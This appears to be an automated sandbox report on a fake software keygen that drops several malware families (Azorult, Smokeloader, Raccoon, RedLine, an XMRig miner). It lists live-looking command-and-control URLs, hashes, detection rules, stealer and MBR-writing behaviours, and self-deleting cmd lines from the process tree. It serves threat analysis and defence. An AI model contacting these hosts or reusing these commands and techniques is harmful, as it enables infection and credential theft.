Analysis
-
max time kernel
48s -
max time network
958s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
28-02-2021 20:38
Static task
static1
Behavioral task
behavioral1
Sample
[CRACHEAP.NET]PW12345Kristanix_Software_Password_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
[CRACHEAP.NET]PW12345Kristanix_Software_Password_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
[CRACHEAP.NET]PW12345Kristanix_Software_Password_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
[CRACHEAP.NET]PW12345Kristanix_Software_Password_keygen_by_KeygenNinja.exe
Resource
win7v20201028
General
-
Target
[CRACHEAP.NET]PW12345Kristanix_Software_Password_keygen_by_KeygenNinja.exe
-
Size
9.2MB
-
MD5
ad902aa32e3899e0800521f9a32f988c
-
SHA1
4f1a7ac4ce37f8fcf31802f73193d3e9a706115a
-
SHA256
cbdca73f35a74084333ad849b15742bed455e5bfd4ce24edb202e71586c4d77f
-
SHA512
631c091108d386b35d50464846fbeae2eff44480d3903866d15ac1ac61ae27eecf2361ac60a7539ca034daec8a63e161ffd66488fdae653546baf0407e11ca43
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
9ba64f4b6fe448911470a88f09d6e7d5b92ff0ab
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral3/memory/5100-312-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral3/memory/5100-313-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral3/memory/5100-311-0x0000000003720000-0x0000000003F7D000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral3/memory/3252-425-0x0000000000940000-0x0000000000968000-memory.dmp family_redline behavioral3/memory/4624-454-0x0000000000400000-0x0000000000426000-memory.dmp family_redline behavioral3/memory/7296-717-0x0000000004BE0000-0x0000000004C0C000-memory.dmp family_redline behavioral3/memory/7296-712-0x0000000004B20000-0x0000000004B4E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Nirsoft 4 IoCs
resource yara_rule behavioral3/files/0x000100000001ab90-98.dat Nirsoft behavioral3/files/0x000100000001ab90-97.dat Nirsoft behavioral3/files/0x000100000001abbc-149.dat Nirsoft behavioral3/files/0x000100000001abbc-148.dat Nirsoft -
XMRig Miner Payload 3 IoCs
resource yara_rule behavioral3/memory/616-679-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral3/memory/616-686-0x0000000140000000-0x000000014072E000-memory.dmp xmrig behavioral3/memory/616-701-0x0000000140000000-0x000000014072E000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Executes dropped EXE 14 IoCs
pid Process 976 keygen-pr.exe 684 keygen-step-1.exe 1132 keygen-step-3.exe 1416 keygen-step-4.exe 2096 key.exe 4532 file.exe 4540 key.exe 1044 CC2F.tmp.exe 1412 CC2F.tmp.exe 420 Setup.exe 2440 0DAB4E96D23C4CA2.exe 2740 0DAB4E96D23C4CA2.exe 3476 Install.exe 1372 multitimer.exe -
Modifies Windows Firewall 1 TTPs
-
resource yara_rule behavioral3/files/0x000100000001ab85-57.dat office_xlm_macros -
Loads dropped DLL 1 IoCs
pid Process 1064 MsiExec.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3348 icacls.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral3/memory/2492-344-0x0000000006D00000-0x0000000006D21000-memory.dmp agile_net -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\O: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 32 api.ipify.org 95 ipinfo.io 139 ip-api.com 249 ipinfo.io 300 ipinfo.io 97 ipinfo.io 190 ipinfo.io 230 api.ipify.org 333 api.2ip.ua 340 api.2ip.ua 436 api.2ip.ua -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Setup.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 420 Setup.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2096 set thread context of 4540 2096 key.exe 88 PID 1044 set thread context of 1412 1044 CC2F.tmp.exe 95 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
pid pid_target Process procid_target 5900 3200 WerFault.exe 142 6108 3200 WerFault.exe 142 5576 3200 WerFault.exe 142 5660 3200 WerFault.exe 142 4996 3200 WerFault.exe 142 5208 3200 WerFault.exe 142 2524 3200 WerFault.exe 142 4856 3200 WerFault.exe 142 3824 3200 WerFault.exe 142 3012 3200 WerFault.exe 142 6500 4456 WerFault.exe 134 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString CC2F.tmp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 CC2F.tmp.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2388 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 3976 taskkill.exe 5476 taskkill.exe 4384 TASKKILL.exe 3408 taskkill.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 file.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e file.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe -
Runs .reg file with regedit 2 IoCs
pid Process 3684 regedit.exe 6556 regedit.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 4584 PING.EXE 4268 PING.EXE 4524 PING.EXE 2052 PING.EXE 5280 PING.EXE -
Script User-Agent 5 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 299 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 96 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 99 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 189 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 248 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2096 key.exe 2096 key.exe 1412 CC2F.tmp.exe 1412 CC2F.tmp.exe 4532 file.exe 4532 file.exe 4532 file.exe 4532 file.exe 4532 file.exe 4532 file.exe 4532 file.exe 4532 file.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeImpersonatePrivilege 2096 key.exe Token: SeTcbPrivilege 2096 key.exe Token: SeChangeNotifyPrivilege 2096 key.exe Token: SeCreateTokenPrivilege 2096 key.exe Token: SeBackupPrivilege 2096 key.exe Token: SeRestorePrivilege 2096 key.exe Token: SeIncreaseQuotaPrivilege 2096 key.exe Token: SeAssignPrimaryTokenPrivilege 2096 key.exe Token: SeImpersonatePrivilege 2096 key.exe Token: SeTcbPrivilege 2096 key.exe Token: SeChangeNotifyPrivilege 2096 key.exe Token: SeCreateTokenPrivilege 2096 key.exe Token: SeBackupPrivilege 2096 key.exe Token: SeRestorePrivilege 2096 key.exe Token: SeIncreaseQuotaPrivilege 2096 key.exe Token: SeAssignPrimaryTokenPrivilege 2096 key.exe Token: SeImpersonatePrivilege 2096 key.exe Token: SeTcbPrivilege 2096 key.exe Token: SeChangeNotifyPrivilege 2096 key.exe Token: SeCreateTokenPrivilege 2096 key.exe Token: SeBackupPrivilege 2096 key.exe Token: SeRestorePrivilege 2096 key.exe Token: SeIncreaseQuotaPrivilege 2096 key.exe Token: SeAssignPrimaryTokenPrivilege 2096 key.exe Token: SeImpersonatePrivilege 2096 key.exe Token: SeTcbPrivilege 2096 key.exe Token: SeChangeNotifyPrivilege 2096 key.exe Token: SeCreateTokenPrivilege 2096 key.exe Token: SeBackupPrivilege 2096 key.exe Token: SeRestorePrivilege 2096 key.exe Token: SeIncreaseQuotaPrivilege 2096 key.exe Token: SeAssignPrimaryTokenPrivilege 2096 key.exe Token: SeImpersonatePrivilege 2096 key.exe Token: SeTcbPrivilege 2096 key.exe Token: SeChangeNotifyPrivilege 2096 key.exe Token: SeCreateTokenPrivilege 2096 key.exe Token: SeBackupPrivilege 2096 key.exe Token: SeRestorePrivilege 2096 key.exe Token: SeIncreaseQuotaPrivilege 2096 key.exe Token: SeAssignPrimaryTokenPrivilege 2096 key.exe Token: SeDebugPrivilege 4532 file.exe Token: SeShutdownPrivilege 3100 msiexec.exe Token: SeIncreaseQuotaPrivilege 3100 msiexec.exe Token: SeSecurityPrivilege 2800 msiexec.exe Token: SeCreateTokenPrivilege 3100 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3100 msiexec.exe Token: SeLockMemoryPrivilege 3100 msiexec.exe Token: SeIncreaseQuotaPrivilege 3100 msiexec.exe Token: SeMachineAccountPrivilege 3100 msiexec.exe Token: SeTcbPrivilege 3100 msiexec.exe Token: SeSecurityPrivilege 3100 msiexec.exe Token: SeTakeOwnershipPrivilege 3100 msiexec.exe Token: SeLoadDriverPrivilege 3100 msiexec.exe Token: SeSystemProfilePrivilege 3100 msiexec.exe Token: SeSystemtimePrivilege 3100 msiexec.exe Token: SeProfSingleProcessPrivilege 3100 msiexec.exe Token: SeIncBasePriorityPrivilege 3100 msiexec.exe Token: SeCreatePagefilePrivilege 3100 msiexec.exe Token: SeCreatePermanentPrivilege 3100 msiexec.exe Token: SeBackupPrivilege 3100 msiexec.exe Token: SeRestorePrivilege 3100 msiexec.exe Token: SeShutdownPrivilege 3100 msiexec.exe Token: SeDebugPrivilege 3100 msiexec.exe Token: SeAuditPrivilege 3100 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3100 msiexec.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 420 Setup.exe 2440 0DAB4E96D23C4CA2.exe 2740 0DAB4E96D23C4CA2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4768 wrote to memory of 4352 4768 [CRACHEAP.NET]PW12345Kristanix_Software_Password_keygen_by_KeygenNinja.exe 78 PID 4768 wrote to memory of 4352 4768 [CRACHEAP.NET]PW12345Kristanix_Software_Password_keygen_by_KeygenNinja.exe 78 PID 4768 wrote to memory of 4352 4768 [CRACHEAP.NET]PW12345Kristanix_Software_Password_keygen_by_KeygenNinja.exe 78 PID 4352 wrote to memory of 976 4352 cmd.exe 81 PID 4352 wrote to memory of 976 4352 cmd.exe 81 PID 4352 wrote to memory of 976 4352 cmd.exe 81 PID 4352 wrote to memory of 684 4352 cmd.exe 83 PID 4352 wrote to memory of 684 4352 cmd.exe 83 PID 4352 wrote to memory of 684 4352 cmd.exe 83 PID 4352 wrote to memory of 1132 4352 cmd.exe 82 PID 4352 wrote to memory of 1132 4352 cmd.exe 82 PID 4352 wrote to memory of 1132 4352 cmd.exe 82 PID 4352 wrote to memory of 1416 4352 cmd.exe 84 PID 4352 wrote to memory of 1416 4352 cmd.exe 84 PID 4352 wrote to memory of 1416 4352 cmd.exe 84 PID 976 wrote to memory of 2096 976 keygen-pr.exe 85 PID 976 wrote to memory of 2096 976 keygen-pr.exe 85 PID 976 wrote to memory of 2096 976 keygen-pr.exe 85 PID 1416 wrote to memory of 4532 1416 keygen-step-4.exe 86 PID 1416 wrote to memory of 4532 1416 keygen-step-4.exe 86 PID 1416 wrote to memory of 4532 1416 keygen-step-4.exe 86 PID 1132 wrote to memory of 4512 1132 keygen-step-3.exe 87 PID 1132 wrote to memory of 4512 1132 keygen-step-3.exe 87 PID 1132 wrote to memory of 4512 1132 keygen-step-3.exe 87 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 2096 wrote to memory of 4540 2096 key.exe 88 PID 4512 wrote to memory of 4584 4512 cmd.exe 91 PID 4512 wrote to memory of 4584 4512 cmd.exe 91 PID 4512 wrote to memory of 4584 4512 cmd.exe 91 PID 4532 wrote to memory of 1044 4532 file.exe 94 PID 4532 wrote to memory of 1044 4532 file.exe 94 PID 4532 wrote to memory of 1044 4532 file.exe 94 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 1044 wrote to memory of 1412 1044 CC2F.tmp.exe 95 PID 4532 wrote to memory of 3932 4532 file.exe 96 PID 4532 wrote to memory of 3932 4532 file.exe 96 PID 4532 wrote to memory of 3932 4532 file.exe 96 PID 3932 wrote to memory of 4268 3932 cmd.exe 99 PID 3932 wrote to memory of 4268 3932 cmd.exe 99 PID 3932 wrote to memory of 4268 3932 cmd.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\[CRACHEAP.NET]PW12345Kristanix_Software_Password_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\[CRACHEAP.NET]PW12345Kristanix_Software_Password_keygen_by_KeygenNinja.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:4540
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:4584
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:684
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4532 -
C:\Users\Admin\AppData\Roaming\CC2F.tmp.exe"C:\Users\Admin\AppData\Roaming\CC2F.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1044 -
C:\Users\Admin\AppData\Roaming\CC2F.tmp.exe"C:\Users\Admin\AppData\Roaming\CC2F.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1412
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4268
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:420 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3100
-
-
C:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exeC:\Users\Admin\AppData\Local\Temp\0DAB4E96D23C4CA2.exe 0011 installp15⤵
